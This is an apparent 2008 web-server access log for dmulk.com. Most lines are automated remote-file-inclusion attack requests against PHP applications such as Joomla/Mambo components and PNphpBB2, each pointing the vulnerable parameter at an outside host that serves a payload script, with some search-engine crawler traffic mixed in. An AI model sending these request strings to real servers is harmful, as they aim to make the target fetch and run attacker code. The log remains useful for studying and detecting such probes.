74.54.89.50 - - [21/Aug/2008:10:25:02 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:25:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:25:02 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:25:14 -0700] "GET /logs/access_080730.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:25:46 -0700] "GET /logs/access_080507.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:25:49 -0700] "GET /index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.30.164.230 - - [21/Aug/2008:10:25:49 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:25:52 -0700] "GET /logs/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:25:54 -0700] "GET /logs/access_080730.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:25:55 -0700] "GET /logs/access_080713.log%20/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:25:56 -0700] "GET /errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:01 -0700] "GET /logs/access_080507.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:26:03 -0700] "GET /logs/access_080606.log%20/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:04 -0700] "GET /logs/access_080702.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:07 -0700] "GET /index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:08 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.206.113.104 - - [21/Aug/2008:10:26:08 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [21/Aug/2008:10:26:10 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 200 9995 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:28 -0700] "GET /logs/access_080507.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:31 -0700] "GET /index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:26:37 -0700] "GET /logs/access_080415.log/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:26:45 -0700] "GET /logs/access_080704.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:27:14 -0700] "GET /logs/access_080704.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.113.226 - - [21/Aug/2008:10:27:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:27:21 -0700] "GET /logs/access_080704.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:27:44 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.80.193.35 - - [21/Aug/2008:10:27:51 -0700] "GET / HTTP/1.0" 200 9797 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; NetCaptor 7.5.4; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:10:27:53 -0700] "GET /logs/access_080410.log//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:27:56 -0700] "GET /logs/access_080702.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:04 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:04 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:04 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:28:10 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:28:10 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:28:10 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:28:11 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:12 -0700] "GET /logs/access_080401.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:21 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:28:21 -0700] "GET /logs/access_080124.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:28:28 -0700] "GET /logs/access_080401.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:28:43 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:28:43 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:28:44 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:28:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.135 - - [21/Aug/2008:10:28:51 -0700] "GET /blog/index.php/2008/06/page/3/?show=gallery&nggpage=3 HTTP/1.1" 200 23322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:28:56 -0700] "GET /logs/access_080218.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:28:59 -0700] "GET /logs/access_080809.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:28:59 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:28:59 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:29:00 -0700] "GET /logs/access_080315.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.91.20.242 - - [21/Aug/2008:10:29:18 -0700] "GET / HTTP/1.1" 200 9813 "http://209.85.215.104/search?q=cache:u1wxchYSKC4J:forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html+jeep+diesel+CJ10-A+tow+truck&hl=en&ct=clnk&cd=1&gl=us" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:29:20 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:29:20 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:29:20 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:29:31 -0700] "GET /logs/access_080124.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:29:38 -0700] "GET /logs/access_080713.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:29:47 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:29:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:29:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:29:48 -0700] "GET /logs/access_080226.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:29:58 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:29:58 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:29:59 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 200 9903 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:29:59 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:30:11 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:30:11 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.55.113.226 - - [21/Aug/2008:10:30:51 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [21/Aug/2008:10:30:59 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pasalabien.net/modules/crit??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.200 - - [21/Aug/2008:10:31:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pasalabien.net/modules/crit??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:31:36 -0700] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:31:36 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:31:44 -0700] "GET /logs/access_080810.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:31:45 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9915 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:31:46 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:31:52 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:32:15 -0700] "GET /logs/access_080731.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.182.209 - - [21/Aug/2008:10:33:01 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [21/Aug/2008:10:33:02 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 200 9995 "-" "libwww-perl/5.803" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:33:14 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:33:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.caneus.org/d??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:10:33:18 -0700] "GET /logs/access_080626.log//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:33:22 -0700] "HEAD /retreat1/webcam/retreat1_00568.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:33:22 -0700] "GET /retreat1/webcam/retreat1_00568.jpg HTTP/1.1" 200 38831 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:33:37 -0700] "GET /logs/access_080515.log/forum.php?act=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:33:38 -0700] "GET /forum.php?act=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:33:39 -0700] "GET /logs/forum.php?act=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:33:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:33:46 -0700] "GET /logs/access_080505.log/forum.php?act=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:33:49 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:34:01 -0700] "GET /bikes/dteel/10MAR07/?N=D HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:08 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 200 61575 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:10 -0700] "GET //?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 200 9907 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:11 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:12 -0700] "GET /logs/access_080313.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:13 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 200 9899 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:14 -0700] "GET /logs/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:34:21 -0700] "GET /logs/access_080503.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.129.24 - - [21/Aug/2008:10:34:22 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:34:28 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
